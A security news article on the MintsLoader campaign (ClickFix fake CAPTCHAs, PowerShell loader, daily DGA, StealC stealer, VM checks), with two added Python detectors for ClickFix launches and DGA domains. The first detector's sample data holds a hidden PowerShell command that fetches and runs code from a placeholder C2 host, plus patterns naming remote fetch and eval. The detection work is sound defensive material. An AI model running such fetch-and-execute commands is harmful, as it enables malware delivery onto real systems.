
Researchers at eSentire have recently identified a new wave of cyberattacks leveraging the MintsLoader malware dropper. This highly sophisticated campaign is targeting the energy, oil and gas, and legal sectors across the United States and Europe, highlighting the evolution of modern cyber threats.
MintsLoader is a PowerShell-based malware loader that spreads via malicious spam campaigns. When victims click on an embedded link, they unknowingly download an obfuscated JavaScript file, which in turn executes a PowerShell command to fetch and deploy MintsLoader. To evade detection, the malware is capable of self-uninstalling after execution.
A distinguishing feature of this campaign is its use of deceptive CAPTCHA challenges. Following what appear to be on-screen verification instructions, victims paste and run a malicious PowerShell command that the page has silently placed in their clipboard. These deceptive tactics, commonly referred to as ClickFix and KongTuke, have been increasingly exploited by cybercriminals.
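The paste-and-run chain described above leaves a recognizable shape in process-creation telemetry: an interactive shell (explorer.exe, which backs the Run dialog) spawning a script host whose command line fetches and evaluates remote code. The following is an added detection example, not eSentire's tooling and not derived from MintsLoader's actual command line; the event records are constructed samples shaped like Sysmon Event ID 1 fields, and the parent/child process names and command-line traits are assumptions about what a ClickFix launch typically looks like.

```python
"""Flag ClickFix-style launches in constructed process-creation events.

Added example: a user pasting clipboard contents into the Run dialog yields
explorer.exe as the parent of a script host, so the rule keys on that parent
plus command-line traits (hidden window, policy bypass, remote fetch,
encoded payload). Event fields mimic Sysmon Event ID 1 but are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Assumption: explorer.exe covers the Win+R Run dialog and the Explorer
# address bar, the places a ClickFix page tells the victim to paste into.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line traits commonly seen in paste-and-run payloads (assumed, generic).
SUSPICIOUS_PATTERNS = [
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),                  # hidden console
    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),  # base64 payload
    re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),    # policy bypass
    re.compile(r"\b(iex|invoke-expression)\b", re.I),               # eval of fetched text
    re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl)\b", re.I),  # remote fetch
    re.compile(r"https?://", re.I),                                 # URL in command line
]


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: ProcEvent) -> int:
    """Return the number of suspicious traits matched, or 0 when the
    parent/child shape does not fit a paste-and-run chain at all."""
    if _basename(ev.parent_image) not in INTERACTIVE_PARENTS:
        return 0
    if _basename(ev.image) not in SCRIPT_HOSTS:
        return 0
    return sum(1 for p in SUSPICIOUS_PATTERNS if p.search(ev.command_line))


def flag_clickfix(events, threshold: int = 2):
    """Events whose trait score reaches the threshold, for triage."""
    return [ev for ev in events if score_event(ev) >= threshold]


# Constructed sample events (the URL is a reserved .invalid placeholder).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -ep bypass -c "iex (iwr http://c2.example.invalid/x)"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Get-ChildItem C:\\Users"),          # benign interactive use
    ProcEvent(r"C:\Program Files\Vendor\agent.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"),  # different parent
]

if __name__ == "__main__":
    for ev in flag_clickfix(SAMPLE_EVENTS):
        print(f"score={score_event(ev)} parent={_basename(ev.parent_image)} cmd={ev.command_line}")
```

The parent-process gate is what keeps this rule quiet: management agents and scheduled tasks launch hidden, encoded PowerShell all day, but they are not children of explorer.exe. Tune the threshold against your own baseline before alerting on it.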
Once executed, MintsLoader establishes communication with a command-and-control (C2) server and retrieves intermediate payloads. The malware employs a domain generation algorithm (DGA), changing its C2 domain daily to evade sandbox detection and frustrate forensic analysis.
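A daily-rotating DGA can be caught from the defender's side without knowing the algorithm: the generated labels look random, and the same host resolves a fresh one each day. The following is an added example, not eSentire's detection logic and not a model of MintsLoader's actual DGA; the DNS log lines are constructed, the scoring thresholds are assumptions, and the heuristic is a generic lexical one (label length, Shannon entropy, vowel ratio, digit count) combined with a per-host count of distinct days on which such a domain was queried.

```python
"""Lexical DGA scoring over constructed DNS query logs.

Added example. Each line is "<timestamp> <host> <queried name>", a constructed
format. A domain earns one point per random-looking trait; a host is reported
when it queried high-scoring domains on several distinct days, which matches
the daily rotation described for MintsLoader's C2.
"""
import math
from collections import defaultdict


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's empirical distribution."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def second_level_label(domain: str) -> str:
    """The label left of the public suffix, assuming a single-label TLD."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_score(domain: str) -> int:
    """0 (looks like a normal name) to 4 (strongly random-looking).
    Thresholds are assumptions chosen for this example, not measured values."""
    label = second_level_label(domain)
    score = 0
    if len(label) >= 12:
        score += 1
    if shannon_entropy(label) >= 3.5:
        score += 1
    vowels = sum(ch in "aeiou" for ch in label)
    if vowels / max(len(label), 1) < 0.25:
        score += 1
    if sum(ch.isdigit() for ch in label) >= 3:
        score += 1
    return score


def parse_line(line: str):
    ts, host, qname = line.split()
    return ts[:10], host, qname      # day, host, queried name


def hosts_with_daily_dga(lines, min_score: int = 3, min_days: int = 2):
    """Hosts that queried a high-scoring domain on at least min_days days."""
    days_by_host = defaultdict(set)
    for line in lines:
        day, host, qname = parse_line(line)
        if dga_score(qname) >= min_score:
            days_by_host[host].add(day)
    return sorted(h for h, days in days_by_host.items() if len(days) >= min_days)


# Constructed sample log: ws-042 resolves a new random-looking .top name daily.
SAMPLE_DNS_LOG = """\
2025-01-13T08:01:10Z ws-042 xk7q2vbn9mzt.top
2025-01-13T08:01:11Z ws-042 www.google.com
2025-01-14T08:03:42Z ws-042 a3h9plqw0rtzcv.top
2025-01-14T09:10:00Z ws-017 www.microsoft.com
2025-01-15T08:02:05Z ws-042 q8w3ertz5xcvb.top
""".splitlines()

if __name__ == "__main__":
    for line in SAMPLE_DNS_LOG:
        _, host, qname = parse_line(line)
        print(f"{host} {qname} score={dga_score(qname)}")
    print("hosts with daily DGA-like queries:", hosts_with_daily_dga(SAMPLE_DNS_LOG))
```

Lexical scoring alone produces false positives on CDN and telemetry hostnames, which is why the per-host, per-day aggregation carries the weight here: a single odd lookup is noise, but a new random-looking domain from the same workstation every day is the rotation pattern the text describes.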
The final stage of the attack involves deploying StealC, a powerful information-stealing malware that has been operating under the “Malware-as-a-Service” (MaaS) model since early 2023.
What sets MintsLoader apart is its unconventional runtime environment checks. The malware scrutinizes hardware specifications, including graphics controller type, CPU cache size, and total processor cores. If the system has only one core or less than 1111 MB of memory, MintsLoader assumes it is running within a virtualized environment and immediately terminates execution.
This evasion strategy significantly increases MintsLoader's resistance to analysis in sandbox environments and on research systems, helping the campaign keep running undetected. Additionally, the threat actors rely on temporary hosting services to deliver the final payload, making the attack chain considerably harder to trace and disrupt.
The convergence of social engineering tactics and advanced obfuscation techniques underscores the growing complexity of modern cyber threats. Security experts strongly advise organizations to remain vigilant and adopt multi-layered defense mechanisms to mitigate potential risks and enhance overall cybersecurity resilience.